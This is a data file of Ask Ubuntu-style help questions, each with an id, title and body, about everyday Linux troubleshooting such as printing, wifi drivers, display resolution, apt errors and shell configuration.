467859	network printer recognised but not printing	i have 2 desktops , 1 of them runs win xp and has a hp laserjet p2055d attached . my ubuntu desktop does not print though ( the one that has n't the printer attached . ) when i sudo system-config-printer i see the printer `` up and running '' yet no print jobs are sent . what do i do ?
467860	conky not showing	today i 've installed conky and gcalcli to create a background which shows my gmail agenda , but when i try to start conky i get the following error : conky : desktop window ( 2e0000a ) is subwindow of root window ( bf ) conky : window type - override conky : drawing to created window ( 0x6000001 ) conky : drawing to double buffer traceback ( most recent call last ) : file `` /usr/bin/gcalcli '' , line 392 , in < module > class gcalcli : file `` /usr/bin/gcalcli '' , line 410 , in gcalcli dateparser = datetimeparser ( ) file `` /usr/bin/gcalcli '' , line 335 , in __init__ self.pdtcalendar = parsedatetime.calendar ( ) ; file `` /usr/lib/python2.7/dist-packages/parsedatetime/__init__.py '' , line 216 , in __init__ self.ptc = constants ( ) file `` /usr/lib/python2.7/dist-packages/parsedatetime/__init__.py '' , line 1733 , in __init__ self.locale = pdtlocales [ 'icu ' ] ( self.localeid ) file `` /usr/lib/python2.7/dist-packages/parsedatetime/pdt_locales.py '' , line 151 , in __init__ self.icu = pyicu.locale ( localeid ) icu.invalidargserror : ( < type 'icu.locale ' > , '__init__ ' , ( none , ) ) i was unable to find a solution to the problem on the internet so i hope that you guys can help me ? the site which i have used for creating this is http : //www.webupd8.org/2010/08/display-google-calendar-on-your-desktop.html my rc file is : alignment top_right background no border_width 0 cpu_avg_samples 2 default_color white default_outline_color white default_shade_color white draw_borders no draw_graph_borders yes draw_outline no draw_shades no use_xft yes xftfont dejavu sans mono : size=12 gap_x 5 gap_y 60 minimum_size 5 5 net_avg_samples 2 double_buffer yes out_to_console no out_to_stderr no extra_newline no own_window yes own_window_class conky own_window_type override own_window_transparent yes own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager stippled_borders 0 update_interval 1.0 uppercase no use_spacer none show_graph_scale no show_graph_range no text_buffer_size 8096 text $ { execi 300 gcalcli -- nc -- cals=owner calw 4 }
467862	keepassx doesnt work	i made a new user and copied my password library over to the new account , . after copying and giving rights with chmod keepass said it isnt a valid library . ( thank you to the guy who corrects my spelling and grammar )
467867	how can i set a resolution of 1366x768 in a dell inspiron n5010	how can i set a resolution of 1366x768 in dell inspiron n5010 as its my native resolution within ubuntu 14.04 the only available resolution is 1024 x 768 please help ! ! !
467868	winpdb gui not running	i installed winpdb ( a python debugger ) . when i tried to run it 's gui version it showed this error wxpython was not found . wxpython 2.6 or higher is required to run the winpdb gui . wxpython is the graphical user interface toolkit used by winpdb . you can find more information on wxpython at http : //www.wxpython.org/ the unicode version of wxpython is recommended for winpdb . to use the debugger without a gui , run rpdb2 . after this i installed wxpython by doing this sudo apt-get install python-wxgtk2.8 , which installed wxpython 2.8 version . but then when i again ran winpdb it is showing the same error and winpdb gui is not running . please help me with this .
467870	how to set the jdk for android studio ?	i ca n't compile a default new project for android 2.1 because ( ? ) the jdk used by android studio is jdk 1.7 but it should be jdk 1.6 . to change it i go to file - > project structure and try to find the jdk 1.6 location . but when i select its directory and press ok i get the following error : please choose a valid jdk directory as you can see on the screenshoot i 'm trying to set java 6 openjdk 64-bits as the new jdk . what can i do ? is n't android studio compatible with openjdk and should i use oracle jdk instead ?
467875	kubuntu 14.04 - no screen resolution changer ?	i just installed a fresh new kubuntu 14.04 on an intel nuc and everything works fine , but i ca n't find an option to change the screen resolution . when i go to settings - > display i get the following weird screen : anybody knows how to fix this ?
467879	updated 12.04lts to 14.04 lts	i have updated ubuntu 12.04 lts to 14.04 lts using usb stick with out taking backup for my date . after the completion of installation my data was not visible but it is there occupied space from hard disk . how can i get the data back ? i did not partition hard disk . please help me on this i have very important data and i am new user to ubuntu
467880	ca n't upgrade xubuntu 13.10 to 14.04	every time i run the upgrade tool , first i get this third party sources disabled some third party entries in your sources.list were disabled . you can re-enable them after the upgrade with the 'software-properties ' tool or your package manager . then i hit enter and move on to an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . i already tried that , reported the bug ( but i forgot the login details on that bug report website ) and all that . i also tried removing all third-party entries in sources.list . i already upgraded my other netbook to 13.10 to 14.04 without problems . my other option is reformatting this thing , and i do n't want to do that just yet .
467884	where are packages downloaded by `` apt-get download '' stored ?	i want to know the storage location of apt-get download command in ubuntu .
467888	how to make the screen stay off until a `` real '' input	when i lock my session with super + l or with ctrl + alt + l , the computer locks itself and after about 5 seconds the screen begins to fade to black , and then turns off ( no signal ) . sometimes it randomly turns back on , and then it never turns back off again . i 'm pretty sure that i have n't touched anything , unless my mouse can pick up the vibrations of the table when music is playing ( it also happens with no music ) . i have no idea what could be causing it . i have tried to relate it to firefox or clementine running , but i have n't found any relation . i suppose it 's the system trying to display something for a brief time , like an icon wiggle from unity or similar . my installation is pretty much stock ubuntu 14.04 ( i have just run apt-get install ubuntu-desktop and there was nothing missing ) .
467889	hp pavilion g6 . ubuntu 12.04 . kernel 3.8.0-39 . wifi/bluetooth suddenly stopped working	so , wifi was working fine till yesterday . there 's suddenly an issue - i ca n't even see the `` enable wireless '' option on the gui top menu . here 's info : iwconfig gives me this : eth0 no wireless extensions . lo no wireless extensions . ifconfig gives me this : eth0 link encap : ethernet hwaddr 28:92:4a:4f:7a : e5 inet addr:192.168.1.241 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :2a92:4aff : fe4f:7ae5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:36663 errors:0 dropped:0 overruns:0 frame:0 tx packets:26131 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:50857091 ( 50.8 mb ) tx bytes:2485146 ( 2.4 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:862 errors:0 dropped:0 overruns:0 frame:0 tx packets:862 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:69884 ( 69.8 kb ) tx bytes:69884 ( 69.8 kb ) lspci gives me this : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] 07:00.0 network controller : ralink corp. device 3290 07:00.1 bluetooth : ralink corp. device 3298 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5229 ( rev 01 ) ifconfig wlan0 up gives me this : wlan0 : error while getting interface flags : no such device
467893	system freezes on the splash screen after 14.04 update	today i decided to upgrade to 14.04 , right after the system reboot i noticed that when the splash screen came up , all the loading dots below the logo were orange ( instead of white , then change to orange after part of the startup process is done ) . after a while it was clear that the system was frozen , i tried to switch using crtl+alt+f ( number ) , but nothing worked , it was completely frozen . i tried power cycling it , same problem again . does anyone have any idea why this is happening and how to fix it ? by the way , my computer is a system76 bonobo extreme . here 's a picture of the splash screen : i was able to get a command line and when i try to start the x server , look what i get at the bottom : so apparently it 's a problem with the nvidia drivers . any ideas ?
467894	unbuntu 14.04 randomly freezes	i know this has been asked several times , but many of them are tagged as duplicates and sent back to what should i do if the computer freezes . i do n't want the computer to freeze and only want those methods as a last resort , not something i have to do every time i boot up ! i am dual booting and windows works fine . i was wondering if perhaps it was trying to do something with the nividia driver on the comp ? ( its a dell precision m4500 laptop ) . it just happens to randomly freeze sometimes , no idea what causes it . it just froze when reading an article online ( not taxing the system at all ) it also froze once when i shut the lid to the laptop and only the mouse was working . it has frozen several other times as well . is there perhaps a driver i should install ( i have no idea where i would get that ) or something else ? i would really like to fix this without having to disable the graphics card and `` knowing '' how to restart it when it freezes . as i said before i know their are several other posts similar to this , but i didnt see any that really helped me all that much . edit : after installing the `` current nividia driver '' from the ubuntu software center it has been running very smoothly and i have not had any freezing issues . if anybody is having the same problem you should definitely try this . thanks for the help guys : )
467895	after being root , the custom .bashrc file no longer runs ?	i modified my .bashrc file to customize my terminal . i modified the else ps1 statement to the one i needed and it works fine but when i login as root it switched back to the one it originally had . how do i fix this ? contents of my file are below : # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything case $ - in *i* ) ; ; * ) return ; ; esac # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ { debian_chroot : - } '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac uncomment for a colored prompt , if the terminal has the capability ; turnedoff by default to not distract the user : the focus in a terminal window should be on the output of commands , not on the prompt force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then we have color support ; assume it 's compliant with ecma-48 ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else # ps1='\n $ { debian_chroot : + ( $ debian_chroot ) } '' \u '' -- > path : \w \n > > > ' ps1='\n '' \u '' -- > path : \w \n > > > ' fi unset color_prompt force_color_prompt if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if ! shopt -oq posix ; then if [ -f /usr/share/bash-completion/bash_completion ] ; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ] ; then . /etc/bash_completion fi fi
467896	how to correctly invoke awk in perl to print out the 3rd last field in a line ?	my script is : # ! /usr/bin/perl -w my $ line= '' 1 2 3 4 5 6 7 '' ; print $ line ; my $ thirdlast=`print $ line |awk ' { print $ ( nf-3 ) } '` ; print $ thirdlast ; the output is : 1 2 3 4 5 6 7 awk : 0602-542 there is an extra ) character . the source line is 1 . the error context is { print 201 1 > > > 201nf-3 ) < < < syntax error the source line is 1. awk : 0602-502 the statement can not be correctly parsed . the source line is 1. awk : 0602-542 there is an extra ) character . what is it complaining about ? anything wrong with my script ? could n't understand why it says the source line is 1 . what fix is needed by my script ?
467899	failed to download repository information check your internet connection . 12.04	i have an internet connection . i tried to change the download server , but it did n't work . i have the following error message . w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_source_sources hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_source_sources hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_packages hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_main_source_sources hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_universe_source_sources hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_main_binary-i386_packages hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_universe_binary-i386_packages hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_main_source_sources hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_universe_source_sources hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_main_binary-i386_packages hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_universe_binary-i386_packages hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en encountered a section with no package : header , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_translation-en encountered a section with no package : header , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_main_i18n_translation-en encountered a section with no package : header , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-security_universe_i18n_translation-en encountered a section with no package : header , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_main_i18n_translation-en encountered a section with no package : header , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise-updates_universe_i18n_translation-en encountered a section with no package : header , e : some index files failed to download . they have been ignored , or old ones used instead .
467900	usb device ca n't be plugged to work when unplugged for some time	[ 5656.644972 ] usb 3-1 : new full-speed usb device number 8 using xhci_hcd [ 5661.643332 ] xhci_hcd 0000:00:14.0 : timeout while waiting for address device command [ 5666.845681 ] xhci_hcd 0000:00:14.0 : timeout while waiting for address device command [ 5667.049615 ] usb 3-1 : device not accepting address 8 , error -62 [ 5672.048059 ] xhci_hcd 0000:00:14.0 : timeout while waiting for a slot [ 5672.048069 ] hub 3-0:1.0 : could n't allocate port 1 usb_device [ 6138.856114 ] xhci_hcd 0000:00:14.0 : timeout while waiting for a slot [ 6138.856127 ] hub 3-0:1.0 : could n't allocate port 1 usb_device
467901	segmentation fault ( core dumped ) in ns2 ubuntu 14.04	when i use ns2 through terminal i keep getting a segment fault ( core dumped ) message . g_0zek @ g-0zek-pc : ~ $ ns lab1.tcl g_0zek @ g-0zek-pc : ~ $ nam lab1.nam segmentation fault ( core dumped ) despite that xgraph works ok the code in the tcl seems ok as it was given from university and one friend of mine runs it fine . any ideas ?
467904	firefox , `` bus error ( core dumped ) ''	if i try to launch firefox i get : bus error ( core dumped ) when , until last week , i had gnome 12.04 it was the same ... then , during the upgrade ( i now have 14.04 ) firefox started working ( without flash player ) . i installed flash player and firefox stopped working . since i am no expert at all , in this answer i honestly do n't understand what does `` simply activate it by going to system settings > software sources > other software and check the boxes for canonical partners '' mean ( i have the box for canonical patners checked , if that is ) . i tried the following things found on the web : if firefox -safe-mode it 's the same tried sudo dpkg -- purge -- force-all firefox , then sudo apt-get install firefox , nothing . disinstalled flash player , useless like suggested here , rm -r ~/.mozilla . too bad for me . then nothing removing ~/.config/dconf/user , whatever help !
467906	when i want to install ubuntu on my laptop i 'll have to erase all my data . `` alonge side windows '' doesnt apppear	i want to install ubuntu from a usb drive . it says i have to erase all my data but i want to install it along side windows 8 . the `` '' install alongside windows '' option does n't appear . what appears is , `` you do n't have an operate syste etc , and note : all your data will be lost . '' i 've already installed ubuntu on my pc ( alonge side windows 7 ) and it worked fine but i do n't know now why is it not working on my laptop which is windows 8 .
467910	kubuntu problem or router problem with connectivity ?	i have a toshiba satellite c55-a on which i 've installed kubuntu 14.04 . when first installed i could n't get the realtek 8188ee card to connect . after a lot of searching , i followed a recommendation to install 13.10 , which gave no problems and recognized the card without a problem . connectivity was decent , and after the install , whether i did it inadvertently or it was an automatic update , the version was upgraded to 14.04 and the card continued to work until at one point a couple weeks ago a recommended update caused the card to stop working . again i searched high and low and tried a couple of possible solutions , although most of them were for earlier versions than 14.04 and none of them resolved the problem . additional searching suggested that an asus usb-n13 would work out of the box , so i decided to go that route . the install was n't so out of the box as what i thought it would be and the only way i could get it to work was to downgrade the kernel per a post here , and everything seemed to be working ok. what i 've encountered is that , if i 'm sitting right next to the router , i get the following diagnostic output : root @ toshibalaptop : /home/rww # iwlist wlan2 scan wlan2 scan completed : cell 01 - address : 00:18 : f8:4a : a2 : e2 essid : '' ourplace '' protocol : ieee 802.11bg mode : master frequency:2.412 ghz ( channel 1 ) encryption key : off bit rates:54 mb/s quality=100/100 signal level=100/100 if i move in another room to the house , i get the following output : root @ toshibalaptop : /home/rww # iwlist wlan2 scan wlan2 scan completed : cell 01 - address : 00:18 : f8:4a : a2 : e2 essid : '' ourplace '' protocol : ieee 802.11bg mode : master frequency:2.412 ghz ( channel 1 ) encryption key : off bit rates:54 mb/s quality=99/100 signal level=67/100 additionally , the connection only holds up for a short while and then drops . the connection manager shows the connection being activated and then immediately being deactivated . so , i do n't know if the issue is actually the card or usb dongle , or if the wireless router is failing . is there anything i can do to figure this out ? thanks .
467912	how do i log in in tty1	i tried to follow the steps on unity does n't load , no launcher , no dash appears , but whenever i do , i do n't know how to log in when it prompts me . how do i log on ? i run 14.04 trusty .
467913	wings 3d will not open on ubuntu 12.04	hi all i have just had my hard drive fail in my lap top . i have put a new drive in and got a fresh install of ubuntu 12.04 on here and all is good except when i try to launch wings3d nothing happens . why ... i am not overly technical savy but would like help to work out why this is happening . cheers rob ; )
467916	i want to play aisleriot solitaire but do n't know how to start it	i just installed ubuntu 14.04 . i am new to ubuntu ( or any linux type os for that matter ) . i go to ubuntu software center then games , double click on aisleriot solitaire & see that it is installed . now how do i start the game . the way it reads , it suggests there is more than one game but i see no list nor any clickable icon to get a list or start a game . started on a commodore 64 many years agoforgot what it was like to be this lost . appreciate any help
467924	how do i get back to nano after hitting ctrl-z if i have no shell prompt	i 'm using nano inside a matlab session that is running inside a screen ( -x ) terminal . i accidentally hit ctrl-z and it immediately leaves nano , prints `` use `` fg '' to return to nano '' , but does not show a command prompt . whatever i type appears on the screen but nothing responds . if i hit ctrl-z , ^z just prints to the screen . any ideas ? using 12.04 .
467930	apt-get update does not work	my apt-get command does not work , i get following error : ~ $ sudo apt-get update ign http : //security.ubuntu.com trusty-security inrelease get:1 http : //security.ubuntu.com trusty-security release.gpg [ 933 b ] get:2 http : //security.ubuntu.com trusty-security release [ 58,5 kb ] ign http : //ar.archive.ubuntu.com trusty-updates inrelease ign http : //ppa.launchpad.net trusty inrelease ign http : //extras.ubuntu.com trusty inrelease ign http : //ar.archive.ubuntu.com trusty-backports inrelease hit http : //ppa.launchpad.net trusty release.gpg get:3 http : //extras.ubuntu.com trusty release.gpg [ 72 b ] hit http : //ppa.launchpad.net trusty release get:4 http : //ar.archive.ubuntu.com trusty release.gpg [ 933 b ] hit http : //extras.ubuntu.com trusty release ign http : //extras.ubuntu.com trusty release get:5 http : //security.ubuntu.com trusty-security/main sources [ 13,9 kb ] hit http : //ppa.launchpad.net trusty/main amd64 packages ign http : //extras.ubuntu.com trusty/main sources/diffindex get:6 http : //ar.archive.ubuntu.com trusty-updates release.gpg [ 933 b ] hit http : //ppa.launchpad.net trusty/main i386 packages ign http : //extras.ubuntu.com trusty/main amd64 packages/diffindex get:7 http : //ar.archive.ubuntu.com trusty-backports release.gpg [ 933 b ] ign http : //extras.ubuntu.com trusty/main i386 packages/diffindex hit http : //ar.archive.ubuntu.com trusty release hit http : //ar.archive.ubuntu.com trusty-updates release hit http : //ar.archive.ubuntu.com trusty-backports release get:8 http : //security.ubuntu.com trusty-security/restricted sources [ 14 b ] hit http : //extras.ubuntu.com trusty/main sources get:9 http : //security.ubuntu.com trusty-security/universe sources [ 2.873 b ] hit http : //extras.ubuntu.com trusty/main amd64 packages hit http : //ar.archive.ubuntu.com trusty/main sources get:10 http : //security.ubuntu.com trusty-security/multiverse sources [ 687 b ] hit http : //extras.ubuntu.com trusty/main i386 packages hit http : //ar.archive.ubuntu.com trusty/restricted sources get:11 http : //security.ubuntu.com trusty-security/main amd64 packages [ 41,1 kb ] hit http : //ar.archive.ubuntu.com trusty/universe sources hit http : //ar.archive.ubuntu.com trusty/multiverse sources ign http : //ppa.launchpad.net trusty/main translation-en_us hit http : //ar.archive.ubuntu.com trusty/main amd64 packages ign http : //ppa.launchpad.net trusty/main translation-en hit http : //ar.archive.ubuntu.com trusty/restricted amd64 packages hit http : //ar.archive.ubuntu.com trusty/universe amd64 packages ign http : //extras.ubuntu.com trusty/main translation-en_us hit http : //ar.archive.ubuntu.com trusty/multiverse amd64 packages ign http : //extras.ubuntu.com trusty/main translation-en hit http : //ar.archive.ubuntu.com trusty/main i386 packages hit http : //ar.archive.ubuntu.com trusty/restricted i386 packages hit http : //ar.archive.ubuntu.com trusty/universe i386 packages hit http : //ar.archive.ubuntu.com trusty/multiverse i386 packages get:12 http : //security.ubuntu.com trusty-security/restricted amd64 packages [ 14 b ] get:13 http : //security.ubuntu.com trusty-security/universe amd64 packages [ 14,6 kb ] hit http : //ar.archive.ubuntu.com trusty/main translation-en hit http : //ar.archive.ubuntu.com trusty/multiverse translation-en get:14 http : //security.ubuntu.com trusty-security/multiverse amd64 packages [ 1.154 b ] get:15 http : //security.ubuntu.com trusty-security/main i386 packages [ 40,5 kb ] hit http : //ar.archive.ubuntu.com trusty/restricted translation-en hit http : //ar.archive.ubuntu.com trusty/universe translation-en hit http : //ar.archive.ubuntu.com trusty-updates/main sources hit http : //ar.archive.ubuntu.com trusty-updates/restricted sources hit http : //ar.archive.ubuntu.com trusty-updates/universe sources hit http : //ar.archive.ubuntu.com trusty-updates/multiverse sources hit http : //ar.archive.ubuntu.com trusty-updates/main amd64 packages hit http : //ar.archive.ubuntu.com trusty-updates/restricted amd64 packages hit http : //ar.archive.ubuntu.com trusty-updates/universe amd64 packages get:16 http : //security.ubuntu.com trusty-security/restricted i386 packages [ 14 b ] get:17 http : //security.ubuntu.com trusty-security/universe i386 packages [ 14,6 kb ] hit http : //ar.archive.ubuntu.com trusty-updates/multiverse amd64 packages hit http : //ar.archive.ubuntu.com trusty-updates/main i386 packages get:18 http : //security.ubuntu.com trusty-security/multiverse i386 packages [ 1.404 b ] hit http : //ar.archive.ubuntu.com trusty-updates/restricted i386 packages hit http : //security.ubuntu.com trusty-security/main translation-en hit http : //ar.archive.ubuntu.com trusty-updates/universe i386 packages hit http : //ar.archive.ubuntu.com trusty-updates/multiverse i386 packages hit http : //security.ubuntu.com trusty-security/multiverse translation-en hit http : //ar.archive.ubuntu.com trusty-updates/main translation-en hit http : //security.ubuntu.com trusty-security/restricted translation-en hit http : //security.ubuntu.com trusty-security/universe translation-en hit http : //ar.archive.ubuntu.com trusty-updates/multiverse translation-en hit http : //ar.archive.ubuntu.com trusty-updates/restricted translation-en hit http : //ar.archive.ubuntu.com trusty-updates/universe translation-en hit http : //ar.archive.ubuntu.com trusty-backports/main sources hit http : //ar.archive.ubuntu.com trusty-backports/restricted sources hit http : //ar.archive.ubuntu.com trusty-backports/universe sources hit http : //ar.archive.ubuntu.com trusty-backports/multiverse sources ign http : //security.ubuntu.com trusty-security/main translation-en_us hit http : //ar.archive.ubuntu.com trusty-backports/main amd64 packages ign http : //security.ubuntu.com trusty-security/multiverse translation-en_us ign http : //security.ubuntu.com trusty-security/restricted translation-en_us hit http : //ar.archive.ubuntu.com trusty-backports/restricted amd64 packages hit http : //ar.archive.ubuntu.com trusty-backports/universe amd64 packages ign http : //security.ubuntu.com trusty-security/universe translation-en_us hit http : //ar.archive.ubuntu.com trusty-backports/multiverse amd64 packages hit http : //ar.archive.ubuntu.com trusty-backports/main i386 packages hit http : //ar.archive.ubuntu.com trusty-backports/restricted i386 packages hit http : //ar.archive.ubuntu.com trusty-backports/universe i386 packages hit http : //ar.archive.ubuntu.com trusty-backports/multiverse i386 packages hit http : //ar.archive.ubuntu.com trusty-backports/main translation-en hit http : //ar.archive.ubuntu.com trusty-backports/multiverse translation-en hit http : //ar.archive.ubuntu.com trusty-backports/restricted translation-en hit http : //ar.archive.ubuntu.com trusty-backports/universe translation-en ign http : //ar.archive.ubuntu.com trusty/main translation-en_us ign http : //ar.archive.ubuntu.com trusty/multiverse translation-en_us ign http : //ar.archive.ubuntu.com trusty/restricted translation-en_us ign http : //ar.archive.ubuntu.com trusty/universe translation-en_us ign http : //ar.archive.ubuntu.com trusty-updates/main translation-en_us ign http : //ar.archive.ubuntu.com trusty-updates/multiverse translation-en_us ign http : //ar.archive.ubuntu.com trusty-updates/restricted translation-en_us ign http : //ar.archive.ubuntu.com trusty-updates/universe translation-en_us ign http : //ar.archive.ubuntu.com trusty-backports/main translation-en_us ign http : //ar.archive.ubuntu.com trusty-backports/multiverse translation-en_us ign http : //ar.archive.ubuntu.com trusty-backports/restricted translation-en_us ign http : //ar.archive.ubuntu.com trusty-backports/universe translation-en_us fetched 193 kb in 41s ( 4.695 b/s ) reading package lists ... done w : gpg error : http : //extras.ubuntu.com trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 i do not know what is the problem . can you help me ?
467936	ubuntu 14.04 stuck in headphone mode ( no sound through speakers )	the basic symptom i was having is that sound was not working in ubuntu 14.04 . however , i had recently used the front headphone jack , and after unplugging the headphones , i noticed in the sound settings control panel that the headphones output device briefly disappears , then immediately re-appears . this leaves the computer in a state where it does n't play any audio . in other words , it 's stuck in headphone mode . this may be a hardware problem , but given the solution i found ( below ) , i kind of doubt it .
467939	how to install huawei ec315 tata photon max data card in ubuntu 14.04 lts	i am new to ubuntu and i have recently bought a huawei ec315 data card ( tata photon max ) . it is a mobile hotspot and usb stick rolled into one device ( http : //www.4gsource.net/blog/huawei-ec315-3g-cdma-evdo-review-yet-another-great-travel-buddy-from-huawei.html ) . after buying i have researched that it works with windows xp , 7 and 8 , but may not be in ubuntu . it is running in windows 7 , but i am unable to use it in ubuntu . my first question is whether this device is compatible with ubuntu 14.04 . if it is then can anyone suggest a method to configure it in ubuntu 14.04 . if it is not , then is there any roadmap to introduce a driver for this device in the near future in the ubuntu platform . thanks sravan
